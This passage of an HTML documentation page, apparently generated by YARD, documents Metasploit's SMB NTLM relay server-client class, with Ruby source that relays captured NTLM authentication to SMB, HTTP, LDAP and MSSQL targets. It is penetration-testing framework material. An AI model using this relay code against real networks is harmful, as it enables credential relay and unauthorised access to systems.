
<!DOCTYPE html>
<html>
<head>
  <!-- Character encoding and responsive viewport for this generated YARD page. -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Class: Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient &mdash; Documentation by YARD 0.9.37</title>
  <!-- Stylesheets, addressed relative to the documentation root six levels up. -->
  <link rel="stylesheet" href="../../../../../../css/style.css">
  <link rel="stylesheet" href="../../../../../../css/common.css">
  <!-- Page-level globals: the documented object's path id and the relative path
       back to the documentation root. Presumably read by js/app.js; confirm
       against that script before renaming or scoping them. -->
  <script>
    pathId = "Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient";
    relpath = '../../../../../../';
  </script>
  <script src="../../../../../../js/jquery.js"></script>
  <script src="../../../../../../js/app.js"></script>
</head>
<body>
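<div class="nav_wrap">
<!-- Navigation pane: embeds the class list page. The title attribute gives the
     frame an accessible name for assistive technology. -->
<iframe id="nav" src="../../../../../../class_list.html?1" title="Class list"></iframe>
<!-- Empty handle element; presumably used by the page script to resize the pane. -->
<div id="resizer"></div>
</div>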
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../../../../_index.html">Index (S)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../../SMB.html" title="Msf::Exploit::Remote::SMB (module)">SMB</a></span></span> &raquo; <span class='title'>Relay</span> &raquo; <span class='title'><span class='object_link'><a href="../NTLM.html" title="Msf::Exploit::Remote::SMB::Relay::NTLM (module)">NTLM</a></span></span>
&raquo;
<span class="title">ServerClient</span>
</div>
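<div id="search">
<!-- Icon-only link to the class list. aria-label supplies the accessible name;
     the three-bar SVG is decorative and hidden from assistive technology. -->
<a class="full_list_link" id="class_list_link"
href="../../../../../../class_list.html" aria-label="Class list">
<svg width="24" height="24" aria-hidden="true" focusable="false">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>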
<div class="clear"></div>
</div>
<div id="content"><h1>Class: Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient
</h1>
<div class="box_info">
<dl>
<dt>Inherits:</dt>
<dd>
<span class="inheritName">RubySMB::Server::ServerClient</span>
<ul class="fullTree">
<li>Object</li>
<li class="next">RubySMB::Server::ServerClient</li>
<li class="next">Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient</li>
</ul>
<a href="#" class="inheritanceTree">show all</a>
</dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb</dd>
</dl>
</div>
<h2>Overview</h2><div class="docstring">
<div class="discussion">
<p>This class represents a single client connected to the server. It stores and processes connection-specific information. It has overridden methods that allow SMB relay attacks.</p>
</div>
</div>
<div class="tags">
</div>
<h2>
Constant Summary
<small><a href="#" class="constants_summary_toggle">collapse</a></small>
</h2>
<dl class="constants">
<dt id="FORCE_RETRY_SESSION_SETUP-constant" class="">FORCE_RETRY_SESSION_SETUP =
<div class="docstring">
<div class="discussion">
<p>The NT Status that will cause a client to reattempt authentication</p>
</div>
</div>
<div class="tags">
</div>
</dt>
<dd><pre class="code"><span class='op'>::</span><span class='const'>WindowsError</span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_NETWORK_SESSION_EXPIRED</span></pre></dd>
</dl>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#create_relay_client-instance_method" title="#create_relay_client (instance method)">#<strong>create_relay_client</strong>(target, timeout) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#do_session_setup_smb2-instance_method" title="#do_session_setup_smb2 (instance method)">#<strong>do_session_setup_smb2</strong>(request, session) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#do_tree_connect_smb2-instance_method" title="#do_tree_connect_smb2 (instance method)">#<strong>do_tree_connect_smb2</strong>(request, session) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#handle_smb1-instance_method" title="#handle_smb1 (instance method)">#<strong>handle_smb1</strong>(raw_request, header) &#x21d2; RubySMB::GenericPacket </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Handle an SMB version 1 message.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(server, dispatcher, relay_timeout:, relay_targets:, listener:) &#x21d2; ServerClient </a>
</span>
<span class="note title constructor">constructor</span>
<span class="summary_desc"><div class='inline'>
<p>A new instance of ServerClient.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#prepare_relay-instance_method" title="#prepare_relay (instance method)">#<strong>prepare_relay</strong>(session) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#process_gss_spnego_init-instance_method" title="#process_gss_spnego_init (instance method)">#<strong>process_gss_spnego_init</strong>(incoming_security_buffer) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#process_gss_spnego_targ-instance_method" title="#process_gss_spnego_targ (instance method)">#<strong>process_gss_spnego_targ</strong>(incoming_security_buffer) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#relay_ntlmssp-instance_method" title="#relay_ntlmssp (instance method)">#<strong>relay_ntlmssp</strong>(session, incoming_security_buffer = nil) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#valid_ntlm_blob%3F-instance_method" title="#valid_ntlm_blob? (instance method)">#<strong>valid_ntlm_blob?</strong>(blob) &#x21d2; Boolean </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#validate_ntlm_blob!-instance_method" title="#validate_ntlm_blob! (instance method)">#<strong>validate_ntlm_blob!</strong>(blob) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<div id="constructor_details" class="method_details_list">
<h2>Constructor Details</h2>
<div class="method_details first">
<h3 class="signature first" id="initialize-instance_method">
#<strong>initialize</strong>(server, dispatcher, relay_timeout:, relay_targets:, listener:) &#x21d2; <tt><span class='object_link'><a href="" title="Msf::Exploit::Remote::SMB::Relay::NTLM::ServerClient (class)">ServerClient</a></span></tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a new instance of ServerClient.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>relay_targets</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Relay/TargetList.html" title="Msf::Exploit::Remote::Relay::TargetList (class)">Msf::Exploit::Remote::Relay::TargetList</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>Relay targets</p>
</div>
</li>
<li>
<span class='name'>listener</span>
<span class='type'>(<tt>Object</tt>)</span>
&mdash;
<div class='inline'>
<p>A listener that can receive on_relay_success/on_relay_failure events</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
12
13
14
15
16
17
18
19</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 12</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_server'>server</span><span class='comma'>,</span> <span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='comma'>,</span> <span class='label'>relay_timeout:</span><span class='comma'>,</span> <span class='label'>relay_targets:</span><span class='comma'>,</span> <span class='label'>listener:</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_server'>server</span><span class='comma'>,</span> <span class='id identifier rubyid_dispatcher'>dispatcher</span><span class='rparen'>)</span>
<span class='ivar'>@timeout</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_timeout'>relay_timeout</span>
<span class='ivar'>@relay_targets</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_targets'>relay_targets</span>
<span class='ivar'>@relay_timeout</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_timeout'>relay_timeout</span>
<span class='ivar'>@listener</span> <span class='op'>=</span> <span class='id identifier rubyid_listener'>listener</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="create_relay_client-instance_method">
#<strong>create_relay_client</strong>(target, timeout) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 285</span>
<span class='kw'>def</span> <span class='id identifier rubyid_create_relay_client'>create_relay_client</span><span class='lparen'>(</span><span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>case</span> <span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span>
<span class='kw'>when</span> <span class='symbol'>:http</span><span class='comma'>,</span> <span class='symbol'>:https</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>HTTP</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='symbol'>:smb</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>SMB</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='symbol'>:ldap</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='rparen'>)</span>
<span class='kw'>when</span> <span class='symbol'>:mssql</span>
<span class='id identifier rubyid_client'>client</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Relay.html" title="Msf::Exploit::Remote::Relay (module)">Relay</a></span></span><span class='op'>::</span><span class='const'>NTLM</span><span class='op'>::</span><span class='const'>Target</span><span class='op'>::</span><span class='const'>MSSQL</span><span class='op'>::</span><span class='const'>Client</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='kw'>self</span><span class='comma'>,</span> <span class='id identifier rubyid_target'>target</span><span class='comma'>,</span> <span class='id identifier rubyid_logger'>logger</span><span class='comma'>,</span> <span class='id identifier rubyid_timeout'>timeout</span><span class='comma'>,</span> <span class='label'>framework_module:</span> <span class='ivar'>@listener</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='const'>RuntimeError</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>unsupported protocol: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='period'>.</span><span class='id identifier rubyid_protocol'>protocol</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='kw'>end</span>
<span class='id identifier rubyid_client'>client</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>ConnectionTimeout</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Timeout error retrieving server challenge from target </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_content'>. Most likely caused by unresponsive target</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>rescue</span> <span class='op'>::</span><span class='const'>Exception</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='id identifier rubyid_msg'>msg</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Unable to create relay to </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_target'>target</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_elog'><span class='object_link'><a href="../../../../../../top-level-namespace.html#elog-instance_method" title="#elog (method)">elog</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_msg'>msg</span><span class='comma'>,</span> <span class='label'>error:</span> <span class='id identifier rubyid_e'>e</span><span class='rparen'>)</span>
<span class='id identifier rubyid_logger'>logger</span><span class='period'>.</span><span class='id identifier rubyid_print_error'>print_error</span> <span class='id identifier rubyid_msg'>msg</span>
<span class='kw'>nil</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="do_session_setup_smb2-instance_method">
#<strong>do_session_setup_smb2</strong>(request, session) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/smb/relay/ntlm/server_client.rb', line 73</span>
<span class='kw'>def</span> <span class='id identifier rubyid_do_session_setup_smb2'>do_session_setup_smb2</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='comma'>,</span> <span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='comment'># TODO: Add shared helper for grabbing session lookups
</span> <span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>==</span> <span class='int'>0</span>
<span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>1</span><span class='op'>..</span><span class='int'>0xfffffffe</span><span class='rparen'>)</span>
<span class='id identifier rubyid_session'>session</span> <span class='op'>=</span> <span class='ivar'>@session_table</span><span class='lbracket'>[</span><span class='id identifier rubyid_session_id'>session_id</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Server</span><span class='op'>::</span><span class='const'>Session</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_session_id'>session_id</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_session'>session</span> <span class='op'>=</span> <span class='ivar'>@session_table</span><span class='lbracket'>[</span><span class='id identifier rubyid_session_id'>session_id</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>ErrorPacket</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_USER_SESSION_DELETED</span>
<span class='kw'>return</span> <span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='comment'># Prepare the relay now, if there&#39;s only one target to relay to and this is the first session setup message
</span> <span class='kw'>if</span> <span class='ivar'>@relay_targets</span> <span class='op'>&amp;&amp;</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span> <span class='op'>==</span> <span class='int'>1</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span> <span class='op'>==</span> <span class='int'>1</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_target</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='ivar'>@relay_targets</span><span class='period'>.</span><span class='id identifier rubyid_next'>next</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_prepare_relay'>prepare_relay</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='comment'># Perform a normal setup flow with ruby_smb
</span> <span class='kw'>unless</span> <span class='id identifier rubyid_session'>session</span><span class='op'>&amp;.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:relay_mode</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='kw'>super</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_user_id'>user_id</span>
<span class='comment'># TODO: Remove guest flag
</span> <span class='kw'>return</span> <span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_relay_result'>relay_result</span> <span class='op'>=</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_relay_ntlmssp'>relay_ntlmssp</span><span class='lparen'>(</span><span class='id identifier rubyid_session'>session</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_buffer'>buffer</span><span class='period'>.</span><span class='id identifier rubyid_to_binary_s'>to_binary_s</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nil?'>nil?</span>
<span class='id identifier rubyid_response'>response</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>SMB2</span><span class='op'>::</span><span class='const'>Packet</span><span class='op'>::</span><span class='const'>SessionSetupResponse</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_credits'>credits</span> <span class='op'>=</span> <span class='int'>1</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span> <span class='op'>=</span> <span class='id identifier rubyid_request'>request</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_message_id'>message_id</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_session_id'>session_id</span> <span class='op'>=</span> <span class='id identifier rubyid_session_id'>session_id</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='op'>::</span><span class='const'>WindowsError</span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>=</span> <span class='op'>::</span><span class='const'>WindowsError</span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_MORE_PROCESSING_REQUIRED</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='symbol'>:none</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_buffer'>buffer</span> <span class='op'>=</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span>
<span class='kw'>elsif</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:ntlm_wrapper</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='symbol'>:gss_spnego</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_buffer'>buffer</span> <span class='op'>=</span> <span class='const'>RubySMB</span><span class='op'>::</span><span class='const'>Gss</span><span class='period'>.</span><span class='id identifier rubyid_gss_type2'>gss_type2</span><span class='lparen'>(</span><span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_message'>message</span><span class='period'>.</span><span class='id identifier rubyid_serialize'>serialize</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_response'>response</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='id identifier rubyid_response'>response</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_update_preauth_hash'>update_preauth_hash</span><span class='lparen'>(</span><span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='ivar'>@dialect</span> <span class='op'>==</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>0x0311</span><span class='tstring_end'>&#39;</span></span>
<span class='kw'>if</span> <span class='id identifier rubyid_relay_result'>relay_result</span><span class='period'>.</span><span class='id identifier rubyid_nt_status'>nt_status</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../../WindowsError.html" title="Msf::WindowsError (class)">WindowsError</a></span></span><span class='op'>::</span><span class='const'>NTStatus</span><span class='op'>::</span><span class='const'>STATUS_SUCCESS</span>
<span class='id identifier rubyid_response'>response</span><span class='period'>.</span><span class='id identifier rubyid_smb2_header'>smb2_header</span><span class='period'>.</span><span class='id identifier rubyid_credits'>credits</span> <span class='op'>=</span> <span class='int'>32</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_state'>state</span> <span class='op'>=</span> <span class='symbol'>:valid</span>
<span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_user_id'>user_id</span> <span class='op'>=</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_metadata'>metadata</span><span class='lbracket'>[</span><span class='symbol'>:identity</span><span class='rbracket'>]</span>
<span class='comment'># TODO: This is invalid now with the relay logic in place
</span> <span class='id identifier rubyid_session'>session</span><span class='period'>.</span><span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='ivar'>@gss_authenticator</span><span class='period'>.</span><span class='id identifier rubyid_session_key'>session_key</span>
